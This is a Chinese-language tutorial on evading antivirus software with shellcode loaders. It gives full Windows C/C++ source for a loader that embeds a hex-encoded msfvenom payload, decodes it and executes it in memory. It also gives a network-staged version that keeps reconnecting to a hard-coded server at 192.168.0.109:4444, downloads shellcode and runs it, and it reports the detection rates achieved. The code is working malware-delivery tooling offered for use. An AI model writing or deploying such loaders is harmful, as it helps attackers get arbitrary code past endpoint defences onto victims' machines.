基于HEX字符串执行的AV绕过
hex-strings-execute

开源项目改造->内嵌shellcode

我们基于 @DimopoulosElias 的 SimpleShellcodeInjector 项目进行一些自定义改造。该项目从命令行参数读入 HEX 字符串,并就地解码为 shellcode,核心代码如下。
for(unsigned int i = 0; i< iterations-1; i++) {//读入HEX字符串转换成shellcode
sscanf(shellcode+2*i, "%2X", &char_in_hex);
shellcode[i] = (char)char_in_hex;
}
由于该项目采用命令行传参,在实际使用过程中可能不太方便,我们将 HEX 字符串直接内嵌到程序中。另外注意上游循环的次数为 iterations-1(iterations 为 HEX 字符串长度),但每两个 HEX 字符才对应一个字节:当 i ≥ iterations/2 时 shellcode+2*i 已经越过字符串末尾,属于越界读。下面的版本把循环次数改为 iterations/2,这是正确性修复而不只是减少开销。
// windows/messagebox - 272 bytes
// https://metasploit.com/
// VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
// TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
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
SimpleShellcodeInjector.c
#include <stdio.h>
#include <Windows.h>
// Hex text of the msfvenom windows/messagebox payload shown above. It is a
// char array initialised from a literal, i.e. a modifiable object (not a
// pointer to a read-only literal); main() decodes it to raw bytes in place.
char shellcode[] = "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";
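/* Value of one ASCII hex digit, or -1 if c is not a hex digit. */
static int hex_nibble(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Decode hex text in buf[0..len) into raw bytes, in place.
 *
 * Trailing whitespace (e.g. a newline) is ignored. The write index i never
 * overtakes the read index 2*i, so the text can be overwritten as it is
 * consumed. Returns the number of bytes produced, or 0 if the text is
 * empty, has an odd number of digits, or contains a non-hex character.
 */
static size_t decode_hex_in_place(char *buf, size_t len)
{
    while (len > 0 && (buf[len - 1] == '\n' || buf[len - 1] == '\r' ||
                       buf[len - 1] == ' '  || buf[len - 1] == '\t')) {
        len--;
    }
    if (len == 0 || (len % 2) != 0) {
        return 0;
    }
    for (size_t i = 0; i < len / 2; i++) {
        int hi = hex_nibble(buf[2 * i]);
        int lo = hex_nibble(buf[2 * i + 1]);
        if (hi < 0 || lo < 0) {
            return 0;
        }
        buf[i] = (char)((hi << 4) | lo);
    }
    return len / 2;
}

/*
 * Decode the embedded hex string into raw bytes, copy them into a fresh
 * read/write allocation, make that allocation executable and jump to it.
 *
 * Changes from the original listing:
 *  - `shellcode` is a char array initialised from a literal, i.e. a
 *    modifiable object, so no VirtualProtect() on it is needed. The
 *    original call also passed a NULL lpflOldProtect, which makes
 *    VirtualProtect() fail, so it never did anything. (If the payload is
 *    ever moved back to a `char *` pointing at a string literal, copy it
 *    into a writable buffer instead of changing page protections.)
 *  - The loop bound is the byte count (strlen / 2); the upstream project's
 *    `iterations - 1` reads past the end of the string.
 *  - Decoding is done by a bounded helper rather than one sscanf_s() per
 *    byte; malformed hex now aborts instead of executing garbage bytes.
 *  - VirtualAlloc()/VirtualProtect() results are checked before use.
 *
 * No diagnostics are printed; error paths simply return 1. Returns 0 only
 * if the payload returns control to main().
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    size_t payload_len = decode_hex_in_place(shellcode, strlen(shellcode));
    if (payload_len == 0) {
        return 1;
    }

    /* RW first, then flip to execute: the pages are never W+X at once. */
    void *exec = VirtualAlloc(0, payload_len, MEM_COMMIT, PAGE_READWRITE);
    if (exec == NULL) {
        return 1;
    }
    memcpy(exec, shellcode, payload_len);

    DWORD old_protect = 0;
    if (!VirtualProtect(exec, payload_len, PAGE_EXECUTE, &old_protect)) {
        return 1;
    }

    ((void (*)(void))exec)();
    return 0;
}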
  • 未加密(内嵌 HEX 字符串)payload 检出率:12%(作者当时的测试结果,未注明扫描平台与日期,仅供参考)

开源项目改造->网络分离免杀

由于内嵌 payload 可能会被部分杀软标记特征码,这里给这个开源项目加入通过网络传递 payload 的功能:程序运行时连接服务端取回 HEX 字符串,再解码执行,代码如下。需要注意,该通道是明文 TCP,没有任何认证或完整性校验,服务端 IP 和端口也硬编码在二进制中;任何能够在该地址应答或劫持连接的人,都可以让程序执行任意代码。
#include <Windows.h>
// Connects to the staging server (address and port are hard-coded in the
// implementation), receives the hex-encoded payload and stores a pointer to
// a heap buffer allocated with new[] in *DataBuffer; the caller owns that
// buffer. Returns the number of bytes received. Callers must validate the
// result before using it as a length: in the original implementation a
// failed recv() returns SOCKET_ERROR (-1), which is 0xFFFFFFFF as a DWORD.
DWORD RecvData(char** DataBuffer);
#include <stdio.h>
#include <Windows.h>
#include "sockets.h"
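/* Value of one ASCII hex digit, or -1 if c is not a hex digit. */
static int hex_nibble(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Decode hex text in buf[0..len) into raw bytes, in place.
 *
 * Trailing whitespace (e.g. a newline sent by the server) is ignored. The
 * write index i never overtakes the read index 2*i, so the text can be
 * overwritten as it is consumed. Returns the number of bytes produced, or
 * 0 if the text is empty, has an odd number of digits, or contains a
 * non-hex character.
 */
static size_t decode_hex_in_place(char *buf, size_t len)
{
    while (len > 0 && (buf[len - 1] == '\n' || buf[len - 1] == '\r' ||
                       buf[len - 1] == ' '  || buf[len - 1] == '\t')) {
        len--;
    }
    if (len == 0 || (len % 2) != 0) {
        return 0;
    }
    for (size_t i = 0; i < len / 2; i++) {
        int hi = hex_nibble(buf[2 * i]);
        int lo = hex_nibble(buf[2 * i + 1]);
        if (hi < 0 || lo < 0) {
            return 0;
        }
        buf[i] = (char)((hi << 4) | lo);
    }
    return len / 2;
}

/*
 * Fetch the hex-encoded payload from the staging server via RecvData()
 * (declared in sockets.h), decode it in place, copy the bytes into a fresh
 * read/write allocation, make it executable and jump to it.
 *
 * Changes from the original listing:
 *  - RecvData()'s return value is validated. It is a DWORD, so a failed
 *    recv() (SOCKET_ERROR, i.e. -1) previously became 0xFFFFFFFF
 *    "iterations" and drove the decoder far past the buffer.
 *  - The received buffer is not guaranteed to be NUL-terminated, so the
 *    decoder is bounded by the byte count instead of relying on
 *    sscanf_s() string parsing.
 *  - Malformed hex aborts instead of executing garbage bytes.
 *  - VirtualAlloc()/VirtualProtect() results are checked before use.
 *
 * The buffer handed back by RecvData() is owned by this function but not
 * released: the process either jumps into the payload or exits at once.
 * No diagnostics are printed; error paths return 1.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    LPSTR shellcode = NULL;
    DWORD received = RecvData(&shellcode);

    /* 0 = nothing received; (DWORD)-1 = recv()'s SOCKET_ERROR passed
     * through unchanged. Neither is a usable length. */
    if (shellcode == NULL || received == 0 || received == (DWORD)-1) {
        return 1;
    }

    size_t payload_len = decode_hex_in_place(shellcode, received);
    if (payload_len == 0) {
        return 1;
    }

    /* RW first, then flip to execute: the pages are never W+X at once. */
    void *exec = VirtualAlloc(0, payload_len, MEM_COMMIT, PAGE_READWRITE);
    if (exec == NULL) {
        return 1;
    }
    memcpy(exec, shellcode, payload_len);

    DWORD old_protect = 0;
    if (!VirtualProtect(exec, payload_len, PAGE_EXECUTE, &old_protect)) {
        return 1;
    }

    ((void (*)(void))exec)();
    return 0;
}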
#include <WinSock2.h>
#include <WS2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma warning(disable : 4996)
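/* Receive buffer size; the payload arrives as hex text, two chars per byte. */
static const int kRecvBufferSize = 2000000;

/*
 * Connect to the hard-coded staging server and read the whole hex-encoded
 * payload it sends.
 *
 * On success *DataBuffer points to a buffer allocated with new[] (owned by
 * the caller, never freed here) holding the received bytes followed by a
 * NUL, and the number of payload bytes is returned. On any failure 0 is
 * returned and *DataBuffer is NULL.
 *
 * Changes from the original listing:
 *  - TCP is a stream: a single recv() of 4096 bytes may return only part
 *    of the payload. The loop now reads until the peer closes the
 *    connection, the 3 s receive timeout fires with data already in hand,
 *    or the buffer is full.
 *  - WSAStartup() and socket() failures return 0 instead of spinning
 *    forever in the connect loop on an invalid socket.
 *  - recv() errors no longer leak SOCKET_ERROR (-1) into the DWORD
 *    return value, which the caller uses as a length.
 *  - The buffer is NUL-terminated, so string functions on it are safe.
 *  - WSACleanup() pairs the WSAStartup(); the stray ';' after the
 *    function body is gone.
 *
 * The connect retry is still unbounded, as in the original: the stager
 * waits until the operator starts listening. NOTE(review): this is a
 * plaintext TCP channel with no authentication or integrity check; anyone
 * who can answer on 192.168.0.109:4444 or intercept the connection can
 * hand this process arbitrary code to run.
 */
DWORD RecvData(char** DataBuffer)
{
    *DataBuffer = NULL;

    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        return 0;
    }

    SOCKET ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (ConnectSocket == INVALID_SOCKET) {
        WSACleanup();
        return 0;
    }

    sockaddr_in clientService = { 0 };
    clientService.sin_family = AF_INET;
    clientService.sin_addr.s_addr = inet_addr("192.168.0.109");
    clientService.sin_port = htons(4444);

    /* Give up on a stalled peer after 3 s; this also ends the read loop
     * below when the server keeps the connection open after sending. */
    struct timeval timeout = { 3, 0 };
    setsockopt(ConnectSocket, SOL_SOCKET, SO_RCVTIMEO,
               (const char*)&timeout, sizeof(timeout));

    /* Keep knocking until the staging server accepts (unbounded on purpose). */
    while (connect(ConnectSocket, (SOCKADDR*)&clientService,
                   sizeof(clientService)) == SOCKET_ERROR) {
        Sleep(5);
    }

    char* buffer = new char[kRecvBufferSize];
    int total = 0;
    for (;;) {
        int room = kRecvBufferSize - 1 - total;   /* keep one byte for the NUL */
        if (room <= 0) {
            break;
        }
        int got = recv(ConnectSocket, buffer + total, room, 0);
        if (got > 0) {
            total += got;
            continue;
        }
        /* got == 0: orderly shutdown, payload complete.
         * got <  0: SOCKET_ERROR, most likely the receive timeout; whatever
         *           was already received is treated as the full payload. */
        break;
    }
    buffer[total] = '\0';

    closesocket(ConnectSocket);
    WSACleanup();

    if (total == 0) {
        delete[] buffer;
        return 0;
    }
    *DataBuffer = buffer;
    return (DWORD)total;
}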
  • 分离免杀检出率:8%

LINKS

GitHub - DimopoulosElias/SimpleShellcodeInjector: SimpleShellcodeInjector receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application.
GitHub